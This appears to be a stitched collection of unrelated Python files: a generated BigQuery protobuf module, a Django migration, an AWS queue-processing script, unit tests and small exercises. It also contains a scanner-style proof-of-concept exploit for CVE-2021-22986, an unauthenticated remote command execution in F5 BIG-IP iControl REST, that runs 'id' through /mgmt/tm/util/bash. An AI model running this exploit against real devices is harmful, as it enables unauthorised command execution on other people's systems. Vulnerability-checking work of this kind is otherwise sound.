training. These are not present for imported models.
Attributes:
regression_metrics:
Populated for regression models.
binary_classification_metrics:
Populated for binary classification/classifier models.
multi_class_classification_metrics:
Populated for multi-class classification/classifier models.
clustering_metrics:
[Beta] Populated for clustering models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.EvaluationMetrics)
),
),
TrainingRun=_reflection.GeneratedProtocolMessageType(
"TrainingRun",
(_message.Message,),
dict(
TrainingOptions=_reflection.GeneratedProtocolMessageType(
"TrainingOptions",
(_message.Message,),
dict(
LabelClassWeightsEntry=_reflection.GeneratedProtocolMessageType(
"LabelClassWeightsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN_TRAININGOPTIONS,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
max_iterations:
The maximum number of iterations in training. Used only for
iterative training algorithms.
loss_type:
Type of loss function used during training run.
learn_rate:
Learning rate in training. Used only for iterative training
algorithms.
l1_regularization:
L1 regularization coefficient.
l2_regularization:
L2 regularization coefficient.
min_relative_progress:
When early\_stop is true, stops training when accuracy
improvement is less than 'min\_relative\_progress'. Used only
for iterative training algorithms.
warm_start:
Whether to train a model from the last checkpoint.
early_stop:
Whether to stop early when the loss doesn't improve
significantly any more (compared to min\_relative\_progress).
Used only for iterative training algorithms.
input_label_columns:
Name of input label columns in training data.
data_split_method:
The data split type for training and evaluation, e.g. RANDOM.
data_split_eval_fraction:
The fraction of evaluation data over the whole input data. The
rest of data will be used as training data. The format should
be double. Accurate to two decimal places. Default value is
0.2.
data_split_column:
The column to split data with. This column won't be used as a
feature. 1. When data\_split\_method is CUSTOM, the
corresponding column should be boolean. The rows with true
value tag are eval data, and the false are training data. 2.
When data\_split\_method is SEQ, the first
DATA\_SPLIT\_EVAL\_FRACTION rows (from smallest to largest) in
the corresponding column are used as training data, and the
rest are eval data. It respects the order in Orderable data
types:
https://cloud.google.com/bigquery/docs/reference/standard-
sql/data-types#data-type-properties
learn_rate_strategy:
The strategy to determine learn rate for the current
iteration.
initial_learn_rate:
Specifies the initial learning rate for the line search learn
rate strategy.
label_class_weights:
Weights associated with each label class, for rebalancing the
training data. Only applicable for classification models.
distance_type:
[Beta] Distance type for clustering models.
num_clusters:
[Beta] Number of clusters for clustering models.
model_uri:
[Beta] Google Cloud Storage URI from which the model was
imported. Only applicable for imported models.
optimization_strategy:
Optimization strategy for training linear regression models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.TrainingOptions)
),
),
IterationResult=_reflection.GeneratedProtocolMessageType(
"IterationResult",
(_message.Message,),
dict(
ClusterInfo=_reflection.GeneratedProtocolMessageType(
"ClusterInfo",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_TRAININGRUN_ITERATIONRESULT_CLUSTERINFO,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single cluster for clustering model.
Attributes:
centroid_id:
Centroid id.
cluster_radius:
Cluster radius, the average distance from centroid to each
point assigned to the cluster.
cluster_size:
Cluster size, the total number of points assigned to the
cluster.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.IterationResult.ClusterInfo)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN_ITERATIONRESULT,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single iteration of the training run.
Attributes:
index:
Index of the iteration, 0 based.
duration_ms:
Time taken to run the iteration in milliseconds.
training_loss:
Loss computed on the training data at the end of iteration.
eval_loss:
Loss computed on the eval data at the end of iteration.
learn_rate:
Learn rate used for this iteration.
cluster_infos:
[Beta] Information about top clusters for clustering models.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun.IterationResult)
),
),
DESCRIPTOR=_MODEL_TRAININGRUN,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Information about a single training query run for the model.
Attributes:
training_options:
Options that were used for this training run, includes user
specified and default options that were used.
start_time:
The start time of this training run.
results:
Output of each iteration run, results.size() <=
max\_iterations.
evaluation_metrics:
The evaluation metrics over training/eval data that were
computed at the end of training.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.TrainingRun)
),
),
LabelsEntry=_reflection.GeneratedProtocolMessageType(
"LabelsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MODEL_LABELSENTRY,
__module__="google.cloud.bigquery_v2.proto.model_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model.LabelsEntry)
),
),
DESCRIPTOR=_MODEL,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
etag:
Output only. A hash of this resource.
model_reference:
Required. Unique identifier for this model.
creation_time:
Output only. The time when this model was created, in
millisecs since the epoch.
last_modified_time:
Output only. The time when this model was last modified, in
millisecs since the epoch.
description:
[Optional] A user-friendly description of this model.
friendly_name:
[Optional] A descriptive name for this model.
labels:
[Optional] The labels associated with this model. You can use
these to organize and group your models. Label keys and values
can be no longer than 63 characters, can only contain
lowercase letters, numeric characters, underscores and dashes.
International characters are allowed. Label values are
optional. Label keys must start with a letter and each label
in the list must have a different key.
expiration_time:
[Optional] The time when this model expires, in milliseconds
since the epoch. If not present, the model will persist
indefinitely. Expired models will be deleted and their storage
reclaimed. The defaultTableExpirationMs property of the
encapsulating dataset can be used to set a default
expirationTime on newly created models.
location:
Output only. The geographic location where the model resides.
This value is inherited from the dataset.
model_type:
Output only. Type of the model resource.
training_runs:
Output only. Information for all training runs in increasing
order of start\_time.
feature_columns:
Output only. Input feature columns that were used to train
this model.
label_columns:
Output only. Label columns that were used to train this model.
The output of the model will have a "predicted\_" prefix to
these columns.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.Model)
),
)
_sym_db.RegisterMessage(Model)
_sym_db.RegisterMessage(Model.RegressionMetrics)
_sym_db.RegisterMessage(Model.AggregateClassificationMetrics)
_sym_db.RegisterMessage(Model.BinaryClassificationMetrics)
_sym_db.RegisterMessage(Model.BinaryClassificationMetrics.BinaryConfusionMatrix)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix.Entry)
_sym_db.RegisterMessage(Model.MultiClassClassificationMetrics.ConfusionMatrix.Row)
_sym_db.RegisterMessage(Model.ClusteringMetrics)
_sym_db.RegisterMessage(Model.EvaluationMetrics)
_sym_db.RegisterMessage(Model.TrainingRun)
_sym_db.RegisterMessage(Model.TrainingRun.TrainingOptions)
_sym_db.RegisterMessage(Model.TrainingRun.TrainingOptions.LabelClassWeightsEntry)
_sym_db.RegisterMessage(Model.TrainingRun.IterationResult)
_sym_db.RegisterMessage(Model.TrainingRun.IterationResult.ClusterInfo)
_sym_db.RegisterMessage(Model.LabelsEntry)
GetModelRequest = _reflection.GeneratedProtocolMessageType(
"GetModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the requested model.
dataset_id:
Dataset ID of the requested model.
model_id:
Model ID of the requested model.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.GetModelRequest)
),
)
_sym_db.RegisterMessage(GetModelRequest)
PatchModelRequest = _reflection.GeneratedProtocolMessageType(
"PatchModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_PATCHMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the model to patch.
dataset_id:
Dataset ID of the model to patch.
model_id:
Model ID of the model to patch.
model:
Patched model. Follows patch semantics. Missing fields are not
updated. To clear a field, explicitly set to default value.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.PatchModelRequest)
),
)
_sym_db.RegisterMessage(PatchModelRequest)
DeleteModelRequest = _reflection.GeneratedProtocolMessageType(
"DeleteModelRequest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETEMODELREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the model to delete.
dataset_id:
Dataset ID of the model to delete.
model_id:
Model ID of the model to delete.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.DeleteModelRequest)
),
)
_sym_db.RegisterMessage(DeleteModelRequest)
ListModelsRequest = _reflection.GeneratedProtocolMessageType(
"ListModelsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTMODELSREQUEST,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
project_id:
Project ID of the models to list.
dataset_id:
Dataset ID of the models to list.
max_results:
The maximum number of results per page.
page_token:
Page token, returned by a previous call to request the next
page of results
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.ListModelsRequest)
),
)
_sym_db.RegisterMessage(ListModelsRequest)
ListModelsResponse = _reflection.GeneratedProtocolMessageType(
"ListModelsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTMODELSRESPONSE,
__module__="google.cloud.bigquery_v2.proto.model_pb2",
__doc__="""Protocol buffer.
Attributes:
models:
Models in the requested dataset. Only the following fields are
populated: model\_reference, model\_type, creation\_time,
last\_modified\_time and labels.
next_page_token:
A token to request the next page of results.
""",
# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.ListModelsResponse)
),
)
_sym_db.RegisterMessage(ListModelsResponse)
DESCRIPTOR._options = None
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY._options = None
_MODEL_LABELSENTRY._options = None
_MODELSERVICE = _descriptor.ServiceDescriptor(
name="ModelService",
full_name="google.cloud.bigquery.v2.ModelService",
file=DESCRIPTOR,
index=0,
serialized_options=_b(
"\312A\027bigquery.googleapis.com\322A\220\001https://www.googleapis.com/auth/bigquery,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/cloud-platform.read-only"
),
serialized_start=6543,
serialized_end=7112,
methods=[
_descriptor.MethodDescriptor(
name="GetModel",
full_name="google.cloud.bigquery.v2.ModelService.GetModel",
index=0,
containing_service=None,
input_type=_GETMODELREQUEST,
output_type=_MODEL,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="ListModels",
full_name="google.cloud.bigquery.v2.ModelService.ListModels",
index=1,
containing_service=None,
input_type=_LISTMODELSREQUEST,
output_type=_LISTMODELSRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="PatchModel",
full_name="google.cloud.bigquery.v2.ModelService.PatchModel",
index=2,
containing_service=None,
input_type=_PATCHMODELREQUEST,
output_type=_MODEL,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="DeleteModel",
full_name="google.cloud.bigquery.v2.ModelService.DeleteModel",
index=3,
containing_service=None,
input_type=_DELETEMODELREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
],
)
_sym_db.RegisterServiceDescriptor(_MODELSERVICE)
DESCRIPTOR.services_by_name["ModelService"] = _MODELSERVICE
# @@protoc_insertion_point(module_scope)
|
# encoding: utf-8
import os
from batman.input_output import formater
from tests.plugins import f_snapshot
coupling = 'coupling-dir'
input_formater = formater('json')
output_formater = formater('csv')
point = input_formater.read(os.path.join(coupling, 'sample-space.json'), ['X1', 'X2'])
result = f_snapshot(point)
output_formater.write(os.path.join(coupling, 'sample-data.csv'), result,
['F1', 'F2', 'F3'], [1, 1, 2])
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Activador',
fields=[
('id_esta', models.BigIntegerField(serialize=False, primary_key=True)),
('descri', models.CharField(max_length=50)),
],
options={
'db_table': 'activador',
'managed': False,
},
),
migrations.CreateModel(
name='BuscadorCant',
fields=[
('id_bus', models.BigIntegerField(serialize=False, primary_key=True)),
('palabra', models.CharField(max_length=100)),
('fecha', models.IntegerField()),
('fecha_ver', models.DateTimeField()),
],
options={
'db_table': 'buscador_cant',
'managed': False,
},
),
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('nombre_cat', models.CharField(max_length=180)),
('visitas', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'categoria',
'managed': False,
},
),
migrations.CreateModel(
name='CCiudadanas',
fields=[
('id_cc', models.AutoField(serialize=False, primary_key=True)),
('nombre_cc', models.CharField(max_length=200)),
('copete_cc', models.CharField(max_length=200, null=True, blank=True)),
('texto_cc', models.TextField()),
('imagen_cc', models.CharField(max_length=255, null=True, blank=True)),
('online', models.CharField(max_length=2)),
('local_sugerido', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'db_table': 'c_ciudadanas',
'managed': False,
},
),
migrations.CreateModel(
name='Contactenos',
fields=[
('id_contactos', models.AutoField(serialize=False, primary_key=True)),
('nombre_contacto', models.CharField(max_length=100)),
('apellido_contacto', models.CharField(max_length=200, null=True, blank=True)),
('direccion_contacto', models.CharField(max_length=255, null=True, blank=True)),
('ciudad_contacto', models.CharField(max_length=255, null=True, blank=True)),
('telefono_contacto', models.CharField(max_length=200, null=True, blank=True)),
('celular_contacto', models.CharField(max_length=200, null=True, blank=True)),
('mail_contacto', models.CharField(max_length=100)),
('contactarme_con', models.CharField(max_length=100)),
('texto_contacto', models.TextField()),
('fecha_contacto', models.DateTimeField()),
('respuesta', models.CharField(max_length=2)),
('texto_resp', models.TextField(null=True, blank=True)),
('fecha_resp', models.DateTimeField(null=True, blank=True)),
],
options={
'db_table': 'contactenos',
'managed': False,
},
),
migrations.CreateModel(
name='ContadorVisitas',
fields=[
('id_visitas', models.AutoField(serialize=False, primary_key=True)),
('ip_visitante', models.CharField(max_length=100)),
('mes_visita', models.CharField(max_length=100)),
('anio_visita', models.CharField(max_length=100)),
('visitas', models.CharField(max_length=255)),
],
options={
'db_table': 'contador_visitas',
'managed': False,
},
),
migrations.CreateModel(
name='DetalleTarjeta',
fields=[
('id_tarje', models.BigIntegerField(serialize=False, primary_key=True)),
('id_negocio', models.IntegerField()),
('estado', models.CharField(max_length=2)),
('id_nombre', models.IntegerField()),
],
options={
'db_table': 'detalle_tarjeta',
'managed': False,
},
),
migrations.CreateModel(
name='Links',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre_link', models.CharField(max_length=200)),
('link', models.CharField(max_length=200)),
],
options={
'db_table': 'links',
'managed': False,
},
),
migrations.CreateModel(
name='Negocio',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('destacado', models.CharField(max_length=2, null=True, blank=True)),
('destacar', models.CharField(max_length=2, null=True, blank=True)),
('sugerido', models.CharField(max_length=2, null=True, blank=True)),
('direccion', models.CharField(max_length=200)),
('latitud', models.CharField(max_length=100, null=True, blank=True)),
('longitud', models.CharField(max_length=100, null=True, blank=True)),
('nombre', models.CharField(max_length=150)),
('zona', models.CharField(max_length=100, null=True, blank=True)),
('localidad', models.CharField(max_length=100, null=True, blank=True)),
('creacion', models.DateTimeField()),
('modificacion', models.DateTimeField(null=True, blank=True)),
('usuario_id', models.IntegerField()),
('ubicacion', models.CharField(max_length=100, null=True, blank=True)),
('imagen', models.CharField(max_length=200, null=True, blank=True)),
('imagen1', models.CharField(max_length=255, null=True, blank=True)),
('imagen2', models.CharField(max_length=255, null=True, blank=True)),
('imagen3', models.CharField(max_length=255, null=True, blank=True)),
('categoria_id', models.IntegerField()),
('descripcion', models.CharField(max_length=255, null=True, blank=True)),
('descrip_larga', models.TextField()),
('hora_aper', models.CharField(max_length=20, null=True, blank=True)),
('hora_cierre', models.CharField(max_length=20, null=True, blank=True)),
('tarjeta_cre', models.CharField(max_length=25)),
('tarjeta_debi', models.CharField(max_length=25)),
('estacionamiento', models.CharField(max_length=2, null=True, blank=True)),
('telefono', models.CharField(max_length=40, null=True, blank=True)),
('barrio', models.CharField(max_length=80, null=True, blank=True)),
('mail', models.CharField(max_length=150, null=True, blank=True)),
('web', models.CharField(max_length=180, null=True, blank=True)),
('rs1', models.CharField(max_length=255, null=True, blank=True)),
('rs2', models.CharField(max_length=255, null=True, blank=True)),
('rs3', models.CharField(max_length=255, null=True, blank=True)),
('rs4', models.CharField(max_length=255, null=True, blank=True)),
('visitas', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
('nuevo', models.CharField(max_length=2)),
],
options={
'db_table': 'negocio',
'managed': False,
},
),
migrations.CreateModel(
name='Noticias',
fields=[
('id_noticias', models.AutoField(serialize=False, primary_key=True)),
('titulo_noticia', models.CharField(max_length=100)),
('copete_noticia', models.CharField(max_length=200)),
('texto_noticia', models.TextField()),
('imagen_noticia', models.CharField(max_length=100, null=True, blank=True)),
('fecha_noticia', models.DateTimeField()),
('autor_noticia', models.CharField(max_length=100)),
('online', models.CharField(max_length=20)),
],
options={
'db_table': 'noticias',
'managed': False,
},
),
migrations.CreateModel(
name='Slide',
fields=[
('id_slide', models.AutoField(serialize=False, primary_key=True)),
('nombre_slide', models.CharField(max_length=200)),
('descrip_slide', models.CharField(max_length=255, null=True, blank=True)),
('imagen_slide', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'slide',
'managed': False,
},
),
migrations.CreateModel(
name='Sugerencias',
fields=[
('id_sug', models.AutoField(serialize=False, primary_key=True)),
('titulo_sug', models.CharField(max_length=200)),
('descrip_sug', models.CharField(max_length=200, null=True, blank=True)),
('texto_sug', models.TextField()),
('imagen_sug', models.CharField(max_length=200, null=True, blank=True)),
('fecha_sug', models.DateTimeField(null=True, blank=True)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'sugerencias',
'managed': False,
},
),
migrations.CreateModel(
name='Tarjeta',
fields=[
('id_ta', models.BigIntegerField(serialize=False, primary_key=True)),
('nombre', models.CharField(max_length=60)),
],
options={
'db_table': 'tarjeta',
'managed': False,
},
),
migrations.CreateModel(
name='TipoUsuario',
fields=[
('idtiusu', models.BigIntegerField(serialize=False, primary_key=True)),
('descri', models.CharField(max_length=20)),
],
options={
'db_table': 'tipo_usuario',
'managed': False,
},
),
migrations.CreateModel(
name='Usuario',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('usuario', models.CharField(max_length=100)),
('nombre', models.CharField(max_length=100, null=True, blank=True)),
('apellido', models.CharField(max_length=100, null=True, blank=True)),
('pass_field', models.CharField(max_length=255, db_column=b'pass')),
('mail', models.CharField(max_length=100)),
('ingreso', models.DateTimeField()),
('modificado', models.DateTimeField(null=True, blank=True)),
('keyes', models.CharField(max_length=60, null=True, blank=True)),
('id_esta', models.IntegerField()),
('validado', models.IntegerField()),
('idtiusu', models.IntegerField()),
('avatar', models.CharField(max_length=100, null=True, blank=True)),
('usuario_semana', models.CharField(max_length=2, null=True, blank=True)),
],
options={
'db_table': 'usuario',
'managed': False,
},
),
migrations.CreateModel(
name='Usuarionegocio',
fields=[
('unid', models.BigIntegerField(serialize=False, primary_key=True)),
('negocio_id', models.IntegerField()),
('usuario_id', models.IntegerField()),
('usuario_fb', models.CharField(max_length=180, null=True, blank=True)),
('ip_usuario', models.CharField(max_length=100)),
('comentario', models.CharField(max_length=180, null=True, blank=True)),
('coment_estado', models.IntegerField(null=True, blank=True)),
('visitas_usu', models.IntegerField()),
('votos', models.IntegerField()),
('media', models.FloatField()),
('fecha_create', models.DateTimeField()),
],
options={
'db_table': 'usuarionegocio',
'managed': False,
},
),
migrations.CreateModel(
name='VotosUsuarios',
fields=[
('id', models.IntegerField(serialize=False, primary_key=True)),
('usuario_id', models.IntegerField()),
('ip_usuario', models.CharField(max_length=100)),
('fecha_voto', models.DateField()),
],
options={
'db_table': 'votos_usuarios',
'managed': False,
},
),
]
|
import json
import boto3
import click
from tqdm import tqdm
from nerd.poll_queue import get_texts_from_queue
from nerd.extract import extract_entities
@click.command()
@click.option(
"--source_queue_name",
prompt="Source queue name",
default="inference-entity-extraction",
help="name of the queue whose messages we want to process"
)
@click.option(
"--dest_bucket_name",
prompt="Destination bucket name",
default="wellcomecollection-inference-calm",
help="the name of the s3 bucket where we'll post results"
)
def process_queue(source_queue_name, dest_bucket_name):
"""
Pulls messages off a queue of calm VHS records, extracts the description
field from each record, and runs a Named Entity Recognition & Disambiguation
process on the text. The resulting list of subjects and entities is then
written to a specified s3 bucket alongside the source text.
"""
s3 = boto3.client("s3")
sqs = boto3.client("sqs")
queue_url = sqs.get_queue_url(QueueName=source_queue_name)["QueueUrl"]
queue_length = int(sqs.get_queue_attributes(
QueueUrl=queue_url,
AttributeNames=["ApproximateNumberOfMessages"]
)["Attributes"]["ApproximateNumberOfMessages"])
loop = tqdm(get_texts_from_queue(queue_url), total=queue_length)
for record_id, title, description in loop:
key = "inferred_data/" + record_id + ".json"
data_to_post = {
"title": {
"text": title,
"entities": extract_entities(title)
},
"description": {
"text": description,
"entities": extract_entities(description)
}
}
binary_data = json.dumps(data_to_post).encode("utf-8")
s3.put_object(
Body=binary_data,
Bucket=dest_bucket_name,
Key=key
)
if __name__ == "__main__":
process_queue()
|
frase = 'Curso em Video Python'
# split() breaks the phrase into a list of words: ['Curso', 'em', 'Video', 'Python']
dividido = frase.split()
# dividido[2] is 'Video'; character index 3 of that word is 'e'
print(dividido[2][3])
|
#Problem 1
#Compute the factorial (n!) of a number using recursion
import sys
def factorial(n):
    if n < 0:
        raise ValueError("factorial() is only defined for non-negative integers")
    # Base case: 0! == 1! == 1; this also terminates the recursion.
    if n <= 1:
        return 1
    return n * factorial(n - 1)
if __name__ == "__main__":
try:
n = int(input("Ingrese un numero: "))
print(factorial(n))
except Exception as e:
print(e)
sys.exit()
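# Quick sanity checks (for reference): factorial(0) == 1, factorial(5) == 120.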
|
import os
import shutil
import unittest
import tests.helper as helper
import thingsvision.vision as vision
import numpy as np
class FeaturesTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
helper.create_test_images()
def setUp(self):
shutil.rmtree(helper.OUT_PATH)
os.makedirs(helper.OUT_PATH)
def get_2D_features(self):
model_name = 'vgg16_bn'
model, dataset, dl = helper.create_model_and_dl(model_name, 'pt')
        module_name = 'classifier.3'
features, _ = model.extract_features(
data_loader=dl,
module_name=module_name,
batch_size=helper.BATCH_SIZE,
flatten_acts=False
)
return features
def get_4D_features(self):
model_name = 'vgg16_bn'
model, dataset, dl = helper.create_model_and_dl(model_name, 'pt')
        module_name = 'features.23'
features, _ = model.extract_features(
data_loader=dl,
module_name=module_name,
batch_size=helper.BATCH_SIZE,
flatten_acts=False
)
return features
def test_postprocessing(self):
"""Test different postprocessing methods (e.g., centering, normalization, compression)."""
features = self.get_2D_features()
flattened_features = features.reshape(helper.NUM_SAMPLES, -1)
centred_features = vision.center_features(flattened_features)
normalized_features = vision.normalize_features(flattened_features)
transformed_features = vision.compress_features(
flattened_features, rnd_seed=42, retained_var=.9)
self.assertTrue(centred_features.mean(axis=0).sum() < 1e-3)
self.assertEqual(np.linalg.norm(normalized_features, axis=1).sum(),
np.ones(features.shape[0]).sum())
self.assertTrue(
transformed_features.shape[1] < flattened_features.shape[1])
def check_file_exists(self, file_name, format, txt_should_exists=True):
if format == 'hdf5':
format = 'h5'
file_name = 'features'
path = os.path.join(helper.OUT_PATH, f'{file_name}.{format}')
if format == 'txt' and not txt_should_exists:
self.assertTrue(not os.path.exists(path))
else:
self.assertTrue(os.path.exists(path))
def test_storing_2d(self):
"""Test storing possibilities."""
features = self.get_2D_features()
for format in helper.FILE_FORMATS:
# tests whether features can be saved in any of the formats as two-dimensional tensor
vision.save_features(
features=features,
out_path=helper.OUT_PATH,
file_format=format,
)
self.check_file_exists('features', format)
def test_storing_4d(self):
features = self.get_4D_features()
for format in helper.FILE_FORMATS:
# tests whether features can be saved in any of the formats as four-dimensional tensor
vision.save_features(
features=features,
out_path=helper.OUT_PATH,
file_format=format,
)
self.check_file_exists('features', format, False)
def test_splitting_2d(self):
n_splits = 3
features = self.get_2D_features()
for format in helper.FILE_FORMATS:
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format=format,
n_splits=n_splits
)
for i in range(1, n_splits):
self.check_file_exists(f'features_0{i}', format)
def test_splitting_4d(self):
n_splits = 3
features = self.get_4D_features()
for format in set(helper.FILE_FORMATS) - set(['txt']):
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format=format,
n_splits=n_splits
)
for i in range(1, n_splits):
self.check_file_exists(f'features_0{i}', format, False)
with self.assertRaises(Exception):
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format='txt',
n_splits=n_splits
)
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''F5 BIG-IP iControl REST unauthenticated RCE''',
"description": '''The iControl REST interface has an unauthenticated remote command execution vulnerability.''',
"severity": "critical",
"references": [
"https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986",
"https://support.f5.com/csp/article/K03009991"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-22986",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["bigip", "cve", "cve2021", "rce", "mirai"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/mgmt/shared/authn/login"""
method = "POST"
data = {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
headers = {'Accept-Language': 'en', 'Authorization': 'Basic YWRtaW46', 'Content-Type': 'application/json', 'Cookie': 'BIGIPAuthCookie=1234', 'Connection': 'close'}
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/mgmt/tm/util/bash"""
method = "POST"
data = {"command":"run","utilCmdArgs":"-c id"}
headers = {'Accept-Language': 'en', 'X-F5-Auth-Token': '§token§', 'Content-Type': 'application/json', 'Connection': 'close'}
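        # Note: '§token§' is a template placeholder carried over from the source
        # and is not substituted anywhere in this script.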
resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""commandResult""" in resp1.text and """uid=""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the reproman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Facility for managing compute resources.
"""
__docformat__ = 'restructuredtext'
from .base import Resource, ResourceManager
_MANAGER = None
def get_manager():
"""Return a ResourceManager instance.
A new instance is not created if one already exists. This getter function
is used rather than a module-level instance to support delaying instance
creation.
"""
global _MANAGER
if _MANAGER is None:
_MANAGER = ResourceManager()
return _MANAGER
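# Usage sketch (illustrative only): repeated calls share a single manager, so
# resources registered through it are visible process-wide.
#
#   manager = get_manager()
#   assert manager is get_manager()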
|
from graphite_feeder.handler.event.enum.alarm import armed
from graphite_feeder.handler.event.enum.alarm import triggered
|
# PYTHON STANDARD LIBRARY IMPORTS ---------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import deque
import itertools
from os import path
# LOCAL MODULE IMPORTS --------------------------------------------------------
from ghautoknit import Structs
from ghautoknit.Constraint import Constraint
# RHINO IMPORTS ---------------------------------------------------------------
from Rhino.Geometry import Mesh as RhinoMesh
from Rhino.Geometry import Point3f as RhinoPoint3f
# ALL LIST --------------------------------------------------------------------
__all__ = [
"LoadConstraints",
"SaveConstraints",
"InterpretStoredConstraints",
"LoadObj",
"SaveObj"
]
# READ AND WRITE FUNCTIONS (PRIVATE) ------------------------------------------
# SCALARS ---------------------------------------------------------------------
def _read_scalar(instream, name):
"""Reads a scalar from the stream and returns it as an integer."""
try:
s = instream.read(Structs.STRUCT_SCALAR.size)
scalar = Structs.STRUCT_SCALAR.unpack(s)[0]
return scalar
except Exception as e:
raise RuntimeError("Failed to read scalar " +
"{} // {}".format(name, str(e)))
def _write_scalar(outstream, scalar, name):
"""Writes a scalar to the output stream."""
try:
s = Structs.STRUCT_SCALAR.pack(scalar)
outstream.write(s)
return True
except Exception as e:
raise RuntimeError("Failed to write scalar " +
"{} // {}".format(name, e))
# VECTORS ---------------------------------------------------------------------
def _read_vector(instream, structure, name):
"""Reads a vector from the instream and returns it as a tuple."""
try:
v = instream.read(structure.size)
vector = structure.unpack(v)
return vector
except Exception as e:
raise RuntimeError("Failed to read vector " +
"{} // {}".format(name, str(e)))
def _write_vector(outstream, vector, structure, name):
"""Writes a vector to the output stream."""
try:
v = structure.pack(*vector)
outstream.write(v)
return True
except Exception as e:
raise RuntimeError("Failed to write vector " +
"{} // {}".format(name, e))
# VECTOR SEQUENCES ------------------------------------------------------------
